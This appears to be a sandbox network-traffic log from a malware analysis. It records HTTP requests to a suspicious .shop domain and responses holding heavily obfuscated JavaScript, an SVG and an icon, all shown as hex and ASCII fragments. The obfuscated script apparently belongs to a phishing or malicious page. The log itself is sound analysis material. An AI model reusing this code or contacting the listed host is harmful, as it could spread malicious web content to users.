2025-01-09 22:30:33 UTC	7993	IN	Data Raw: 2c 5f 30 78 35 61 32 36 37 31 2c 5f 30 78 34 62 66 33 66 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 61 32 36 37 31 2d 20 2d 30 78 32 64 39 2c 5f 30 78 32 64 62 32 64 31 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 37 35 34 63 28 5f 30 78 33 33 39 30 32 62 2c 5f 30 78 34 33 39 31 30 36 2c 5f 30 78 33 31 39 36 36 64 2c 5f 30 78 33 39 36 65 37 62 2c 5f 30 78 39 64 64 64 36 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 33 31 39 36 36 64 2d 20 2d 30 78 32 36 62 2c 5f 30 78 39 64 64 64 36 65 29 3b 7d 76 61 72 20 5f 30 78 32 66 38 63 34 30 3d 7b 7d 3b 5f 30 78 32 66 38 63 34 30 5b 5f 30 78 33 34 30 32 34 64 28 30 78 34 38 39 2c 30 78 35 61 32 2c 30 78 34 30 38 2c 30 78 35 66 62 2c 30 78 35 64 33 29 5d 3d 5f 30 78 33 Data Ascii: ,_0x5a2671,_0x4bf3f7){return _0x4e53(_0x5a2671- -0x2d9,_0x2db2d1);}function _0x19754c(_0x33902b,_0x439106,_0x31966d,_0x396e7b,_0x9ddd6e){return _0x4e53(_0x31966d- -0x26b,_0x9ddd6e);}var _0x2f8c40={};_0x2f8c40[_0x34024d(0x489,0x5a2,0x408,0x5fb,0x5d3)]=_0x3
2025-01-09 22:30:33 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:33 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 20 2d 30 78 31 31 36 2c 5f 30 78 61 34 32 32 63 64 2d 30 78 31 33 39 2c 5f 30 78 34 65 34 65 30 36 2d 30 78 31 35 39 2c 5f 30 78 61 34 32 32 63 64 2c 5f 30 78 35 62 38 62 65 61 2d 30 78 38 37 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 34 34 34 63 30 28 5f 30 78 31 64 31 33 65 39 2c 5f 30 78 34 39 61 65 33 35 2c 5f 30 78 35 39 62 64 35 37 2c 5f 30 78 35 33 37 36 66 65 2c 5f 30 78 62 61 63 35 65 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 30 36 39 64 28 5f 30 78 31 64 31 33 65 39 2d 30 78 31 39 2c 5f 30 78 34 39 61 65 33 35 2d 30 78 39 65 2c 5f 30 78 62 61 63 35 65 35 2d 20 2d 30 78 36 36 61 2c 5f 30 78 34 39 61 65 33 35 2c 5f 30 78 62 61 63 35 65 35 2d 30 78 64 30 29 3b 7d 76 61 72 20 5f 30 78 38 34 64 65 36 65 3d 7b 27 76 55 73 7a Data Ascii: 1f40 -0x116,_0xa422cd-0x139,_0x4e4e06-0x159,_0xa422cd,_0x5b8bea-0x87);}function _0x2444c0(_0x1d13e9,_0x49ae35,_0x59bd57,_0x5376fe,_0xbac5e5){return _0x58069d(_0x1d13e9-0x19,_0x49ae35-0x9e,_0xbac5e5- -0x66a,_0x49ae35,_0xbac5e5-0xd0);}var _0x84de6e={'vUsz
2025-01-09 22:30:33 UTC	7822	IN	Data Raw: 31 38 37 2c 5f 30 78 31 33 32 30 36 35 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 65 63 66 35 38 39 5b 5f 30 78 34 39 30 61 62 30 28 2d 30 78 31 30 34 2c 30 78 31 30 36 2c 2d 30 78 35 38 2c 2d 30 78 31 63 32 2c 2d 30 78 35 37 29 5d 28 5f 30 78 32 61 37 62 32 62 2c 5f 30 78 32 33 64 32 35 33 29 3b 7d 2c 27 54 6f 48 65 78 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 30 61 62 63 37 2c 5f 30 78 35 31 30 39 66 61 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 61 39 39 65 38 28 5f 30 78 32 35 33 35 32 34 2c 5f 30 78 34 63 38 35 37 34 2c 5f 30 78 32 34 62 30 61 66 2c 5f 30 78 32 39 38 31 34 37 2c 5f 30 78 32 37 34 36 35 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 32 34 62 30 61 66 2d 30 78 33 31 39 2c 5f 30 78 34 63 38 35 37 34 29 3b 7d 72 65 74 75 Data Ascii: 187,_0x132065);}return _0xecf589[_0x490ab0(-0x104,0x106,-0x58,-0x1c2,-0x57)](_0x2a7b2b,_0x23d253);},'ToHex':function(_0x10abc7,_0x5109fa){function _0xea99e8(_0x253524,_0x4c8574,_0x24b0af,_0x298147,_0x274655){return _0x4e53(_0x24b0af-0x319,_0x4c8574);}retu
2025-01-09 22:30:33 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:33 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 34 65 38 37 66 2c 5f 30 78 31 32 66 61 61 38 2c 5f 30 78 32 64 30 37 31 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 34 34 30 31 30 61 2d 20 2d 30 78 38 32 2c 5f 30 78 33 34 65 38 37 66 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 31 33 31 38 33 32 5b 5f 30 78 31 37 31 62 65 34 28 30 78 31 39 38 2c 30 78 31 30 35 2c 30 78 65 2c 30 78 33 36 34 2c 2d 30 78 32 65 29 5d 28 5f 30 78 34 31 63 39 39 64 2c 5f 30 78 34 36 35 36 62 35 2c 5f 30 78 35 34 65 66 64 30 2c 5f 30 78 32 61 30 37 66 37 29 3b 7d 2c 27 66 46 51 54 47 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 62 38 64 63 2c 5f 30 78 34 63 34 32 36 34 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 62 66 62 39 66 28 5f 30 78 35 38 65 34 33 64 2c 5f 30 78 31 30 37 66 39 32 2c 5f Data Ascii: 1f404e87f,_0x12faa8,_0x2d071f){return _0x4e53(_0x44010a- -0x82,_0x34e87f);}return _0x131832[_0x171be4(0x198,0x105,0xe,0x364,-0x2e)](_0x41c99d,_0x4656b5,_0x54efd0,_0x2a07f7);},'fFQTG':function(_0x3fb8dc,_0x4c4264){function _0x5bfb9f(_0x58e43d,_0x107f92,_
2025-01-09 22:30:33 UTC	7822	IN	Data Raw: 44 43 4f 64 27 2c 27 54 56 75 47 75 27 2c 27 76 55 73 7a 42 27 2c 27 55 64 49 51 4f 27 2c 27 4f 46 5a 4e 77 27 2c 27 74 57 79 45 6a 27 2c 27 6a 6d 46 6c 78 27 2c 27 68 72 71 53 7a 27 2c 27 71 49 52 44 4a 27 2c 27 6f 6d 74 58 6d 27 2c 27 4f 72 72 43 72 27 2c 27 72 56 71 72 61 27 2c 27 42 4e 4d 6c 64 27 2c 27 69 61 71 66 66 27 2c 27 62 7a 65 75 65 27 2c 27 53 77 79 6b 53 27 2c 27 6b 59 72 54 68 27 2c 27 6b 4f 6e 49 65 27 2c 27 7a 6e 53 58 5a 27 2c 27 42 6b 6f 4e 69 27 2c 27 68 55 6a 4c 63 27 2c 27 65 68 6a 6d 4a 27 2c 27 50 78 79 6e 4b 27 2c 27 41 54 6b 77 74 27 2c 27 62 70 72 47 45 27 2c 27 72 75 63 74 6f 27 2c 27 77 47 59 6f 48 27 2c 27 4e 72 75 54 4a 27 2c 27 70 46 4b 51 54 27 2c 27 77 51 47 4f 7a 27 2c 27 71 53 55 55 43 27 2c 27 4e 79 6c 59 53 27 2c 27 Data Ascii: DCOd','TVuGu','vUszB','UdIQO','OFZNw','tWyEj','jmFlx','hrqSz','qIRDJ','omtXm','OrrCr','rVqra','BNMld','iaqff','bzeue','SwykS','kYrTh','kOnIe','znSXZ','BkoNi','hUjLc','ehjmJ','PxynK','ATkwt','bprGE','ructo','wGYoH','NruTJ','pFKQT','wQGOz','qSUUC','NylYS','
2025-01-09 22:30:33 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:33 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 30 78 32 31 63 38 31 63 29 3b 7d 2c 27 68 67 50 41 59 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 35 35 38 38 33 2c 5f 30 78 35 62 34 66 31 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 35 35 38 38 33 28 5f 30 78 35 62 34 66 31 66 29 3b 7d 2c 27 6e 41 4d 69 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 33 34 33 37 37 2c 5f 30 78 35 65 38 64 32 30 2c 5f 30 78 32 64 39 38 66 33 2c 5f 30 78 31 61 62 33 63 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 33 34 33 37 37 28 5f 30 78 35 65 38 64 32 30 2c 5f 30 78 32 64 39 38 66 33 2c 5f 30 78 31 61 62 33 63 61 29 3b 7d 2c 27 4e 6a 74 75 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 65 63 33 34 66 2c 5f 30 78 32 35 35 66 65 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 65 63 33 34 66 2a 5f 30 78 32 35 35 Data Ascii: 1f400x21c81c);},'hgPAY':function(_0x255883,_0x5b4f1f){return _0x255883(_0x5b4f1f);},'nAMiT':function(_0x234377,_0x5e8d20,_0x2d98f3,_0x1ab3ca){return _0x234377(_0x5e8d20,_0x2d98f3,_0x1ab3ca);},'Njtul':function(_0x5ec34f,_0x255fea){return _0x5ec34f*_0x255

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:33 UTC	770	OUT	GET /m/bxg/ZQFETUCJ4MFF4FUB31FABJSBQ HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:33 UTC	247	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:33 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 22:30:33 UTC	1871	IN	Data Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
2025-01-09 22:30:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:34 UTC	486	OUT	GET /m/ecpt/8M1Q7M3MYL7GVKY6S0FI3RTYX HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:34 UTC	268	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:34 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
2025-01-09 22:30:34 UTC	7924	IN	Data Raw: 33 65 32 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 62 31 39 38 39 2c 5f 30 78 34 64 64 38 64 64 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 39 38 63 37 36 30 28 5f 30 78 35 62 63 30 36 36 2c 5f 30 78 32 62 66 65 38 62 2c 5f 30 78 33 61 65 35 61 34 2c 5f 30 78 62 62 32 64 63 63 2c 5f 30 78 31 31 35 35 65 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 62 63 30 36 36 2d 20 2d 30 78 32 64 66 2c 5f 30 78 62 62 32 64 63 63 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 65 65 30 37 31 28 5f 30 78 32 63 63 64 62 62 2c 5f 30 78 35 38 38 63 64 35 2c 5f 30 78 32 31 66 36 31 34 2c 5f 30 78 33 65 38 65 32 66 2c 5f 30 78 34 64 32 31 39 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 34 64 32 31 39 61 2d 20 2d 30 78 32 32 33 2c Data Ascii: 3e27(function(_0x5b1989,_0x4dd8dd){function _0x98c760(_0x5bc066,_0x2bfe8b,_0x3ae5a4,_0xbb2dcc,_0x1155ea){return _0x4e53(_0x5bc066- -0x2df,_0xbb2dcc);}function _0x1ee071(_0x2ccdbb,_0x588cd5,_0x21f614,_0x3e8e2f,_0x4d219a){return _0x4e53(_0x4d219a- -0x223,
2025-01-09 22:30:34 UTC	7993	IN	Data Raw: 2c 5f 30 78 35 61 32 36 37 31 2c 5f 30 78 34 62 66 33 66 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 35 61 32 36 37 31 2d 20 2d 30 78 32 64 39 2c 5f 30 78 32 64 62 32 64 31 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 37 35 34 63 28 5f 30 78 33 33 39 30 32 62 2c 5f 30 78 34 33 39 31 30 36 2c 5f 30 78 33 31 39 36 36 64 2c 5f 30 78 33 39 36 65 37 62 2c 5f 30 78 39 64 64 64 36 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 33 31 39 36 36 64 2d 20 2d 30 78 32 36 62 2c 5f 30 78 39 64 64 64 36 65 29 3b 7d 76 61 72 20 5f 30 78 32 66 38 63 34 30 3d 7b 7d 3b 5f 30 78 32 66 38 63 34 30 5b 5f 30 78 33 34 30 32 34 64 28 30 78 34 38 39 2c 30 78 35 61 32 2c 30 78 34 30 38 2c 30 78 35 66 62 2c 30 78 35 64 33 29 5d 3d 5f 30 78 33 Data Ascii: ,_0x5a2671,_0x4bf3f7){return _0x4e53(_0x5a2671- -0x2d9,_0x2db2d1);}function _0x19754c(_0x33902b,_0x439106,_0x31966d,_0x396e7b,_0x9ddd6e){return _0x4e53(_0x31966d- -0x26b,_0x9ddd6e);}var _0x2f8c40={};_0x2f8c40[_0x34024d(0x489,0x5a2,0x408,0x5fb,0x5d3)]=_0x3
2025-01-09 22:30:34 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:34 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 20 2d 30 78 31 31 36 2c 5f 30 78 61 34 32 32 63 64 2d 30 78 31 33 39 2c 5f 30 78 34 65 34 65 30 36 2d 30 78 31 35 39 2c 5f 30 78 61 34 32 32 63 64 2c 5f 30 78 35 62 38 62 65 61 2d 30 78 38 37 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 34 34 34 63 30 28 5f 30 78 31 64 31 33 65 39 2c 5f 30 78 34 39 61 65 33 35 2c 5f 30 78 35 39 62 64 35 37 2c 5f 30 78 35 33 37 36 66 65 2c 5f 30 78 62 61 63 35 65 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 30 36 39 64 28 5f 30 78 31 64 31 33 65 39 2d 30 78 31 39 2c 5f 30 78 34 39 61 65 33 35 2d 30 78 39 65 2c 5f 30 78 62 61 63 35 65 35 2d 20 2d 30 78 36 36 61 2c 5f 30 78 34 39 61 65 33 35 2c 5f 30 78 62 61 63 35 65 35 2d 30 78 64 30 29 3b 7d 76 61 72 20 5f 30 78 38 34 64 65 36 65 3d 7b 27 76 55 73 7a Data Ascii: 1f40 -0x116,_0xa422cd-0x139,_0x4e4e06-0x159,_0xa422cd,_0x5b8bea-0x87);}function _0x2444c0(_0x1d13e9,_0x49ae35,_0x59bd57,_0x5376fe,_0xbac5e5){return _0x58069d(_0x1d13e9-0x19,_0x49ae35-0x9e,_0xbac5e5- -0x66a,_0x49ae35,_0xbac5e5-0xd0);}var _0x84de6e={'vUsz
2025-01-09 22:30:34 UTC	7822	IN	Data Raw: 31 38 37 2c 5f 30 78 31 33 32 30 36 35 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 65 63 66 35 38 39 5b 5f 30 78 34 39 30 61 62 30 28 2d 30 78 31 30 34 2c 30 78 31 30 36 2c 2d 30 78 35 38 2c 2d 30 78 31 63 32 2c 2d 30 78 35 37 29 5d 28 5f 30 78 32 61 37 62 32 62 2c 5f 30 78 32 33 64 32 35 33 29 3b 7d 2c 27 54 6f 48 65 78 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 30 61 62 63 37 2c 5f 30 78 35 31 30 39 66 61 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 61 39 39 65 38 28 5f 30 78 32 35 33 35 32 34 2c 5f 30 78 34 63 38 35 37 34 2c 5f 30 78 32 34 62 30 61 66 2c 5f 30 78 32 39 38 31 34 37 2c 5f 30 78 32 37 34 36 35 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 32 34 62 30 61 66 2d 30 78 33 31 39 2c 5f 30 78 34 63 38 35 37 34 29 3b 7d 72 65 74 75 Data Ascii: 187,_0x132065);}return _0xecf589[_0x490ab0(-0x104,0x106,-0x58,-0x1c2,-0x57)](_0x2a7b2b,_0x23d253);},'ToHex':function(_0x10abc7,_0x5109fa){function _0xea99e8(_0x253524,_0x4c8574,_0x24b0af,_0x298147,_0x274655){return _0x4e53(_0x24b0af-0x319,_0x4c8574);}retu
2025-01-09 22:30:34 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:34 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 34 65 38 37 66 2c 5f 30 78 31 32 66 61 61 38 2c 5f 30 78 32 64 30 37 31 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 35 33 28 5f 30 78 34 34 30 31 30 61 2d 20 2d 30 78 38 32 2c 5f 30 78 33 34 65 38 37 66 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 31 33 31 38 33 32 5b 5f 30 78 31 37 31 62 65 34 28 30 78 31 39 38 2c 30 78 31 30 35 2c 30 78 65 2c 30 78 33 36 34 2c 2d 30 78 32 65 29 5d 28 5f 30 78 34 31 63 39 39 64 2c 5f 30 78 34 36 35 36 62 35 2c 5f 30 78 35 34 65 66 64 30 2c 5f 30 78 32 61 30 37 66 37 29 3b 7d 2c 27 66 46 51 54 47 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 62 38 64 63 2c 5f 30 78 34 63 34 32 36 34 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 62 66 62 39 66 28 5f 30 78 35 38 65 34 33 64 2c 5f 30 78 31 30 37 66 39 32 2c 5f Data Ascii: 1f404e87f,_0x12faa8,_0x2d071f){return _0x4e53(_0x44010a- -0x82,_0x34e87f);}return _0x131832[_0x171be4(0x198,0x105,0xe,0x364,-0x2e)](_0x41c99d,_0x4656b5,_0x54efd0,_0x2a07f7);},'fFQTG':function(_0x3fb8dc,_0x4c4264){function _0x5bfb9f(_0x58e43d,_0x107f92,_
2025-01-09 22:30:34 UTC	7822	IN	Data Raw: 44 43 4f 64 27 2c 27 54 56 75 47 75 27 2c 27 76 55 73 7a 42 27 2c 27 55 64 49 51 4f 27 2c 27 4f 46 5a 4e 77 27 2c 27 74 57 79 45 6a 27 2c 27 6a 6d 46 6c 78 27 2c 27 68 72 71 53 7a 27 2c 27 71 49 52 44 4a 27 2c 27 6f 6d 74 58 6d 27 2c 27 4f 72 72 43 72 27 2c 27 72 56 71 72 61 27 2c 27 42 4e 4d 6c 64 27 2c 27 69 61 71 66 66 27 2c 27 62 7a 65 75 65 27 2c 27 53 77 79 6b 53 27 2c 27 6b 59 72 54 68 27 2c 27 6b 4f 6e 49 65 27 2c 27 7a 6e 53 58 5a 27 2c 27 42 6b 6f 4e 69 27 2c 27 68 55 6a 4c 63 27 2c 27 65 68 6a 6d 4a 27 2c 27 50 78 79 6e 4b 27 2c 27 41 54 6b 77 74 27 2c 27 62 70 72 47 45 27 2c 27 72 75 63 74 6f 27 2c 27 77 47 59 6f 48 27 2c 27 4e 72 75 54 4a 27 2c 27 70 46 4b 51 54 27 2c 27 77 51 47 4f 7a 27 2c 27 71 53 55 55 43 27 2c 27 4e 79 6c 59 53 27 2c 27 Data Ascii: DCOd','TVuGu','vUszB','UdIQO','OFZNw','tWyEj','jmFlx','hrqSz','qIRDJ','omtXm','OrrCr','rVqra','BNMld','iaqff','bzeue','SwykS','kYrTh','kOnIe','znSXZ','BkoNi','hUjLc','ehjmJ','PxynK','ATkwt','bprGE','ructo','wGYoH','NruTJ','pFKQT','wQGOz','qSUUC','NylYS','
2025-01-09 22:30:34 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:34 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 30 78 32 31 63 38 31 63 29 3b 7d 2c 27 68 67 50 41 59 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 35 35 38 38 33 2c 5f 30 78 35 62 34 66 31 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 35 35 38 38 33 28 5f 30 78 35 62 34 66 31 66 29 3b 7d 2c 27 6e 41 4d 69 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 33 34 33 37 37 2c 5f 30 78 35 65 38 64 32 30 2c 5f 30 78 32 64 39 38 66 33 2c 5f 30 78 31 61 62 33 63 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 33 34 33 37 37 28 5f 30 78 35 65 38 64 32 30 2c 5f 30 78 32 64 39 38 66 33 2c 5f 30 78 31 61 62 33 63 61 29 3b 7d 2c 27 4e 6a 74 75 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 65 63 33 34 66 2c 5f 30 78 32 35 35 66 65 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 65 63 33 34 66 2a 5f 30 78 32 35 35 Data Ascii: 1f400x21c81c);},'hgPAY':function(_0x255883,_0x5b4f1f){return _0x255883(_0x5b4f1f);},'nAMiT':function(_0x234377,_0x5e8d20,_0x2d98f3,_0x1ab3ca){return _0x234377(_0x5e8d20,_0x2d98f3,_0x1ab3ca);},'Njtul':function(_0x5ec34f,_0x255fea){return _0x5ec34f*_0x255

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:34 UTC	769	OUT	GET /m/ic/1A9TC07ARGDSH4FIUU63X4WA8 HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
2025-01-09 22:30:34 UTC	247	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:34 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 22:30:34 UTC	7945	IN	Data Raw: 33 65 33 63 0d 0a 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 Data Ascii: 3e3ch(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333
2025-01-09 22:30:34 UTC	7993	IN	Data Raw: 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 Data Ascii: DDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDD
2025-01-09 22:30:34 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
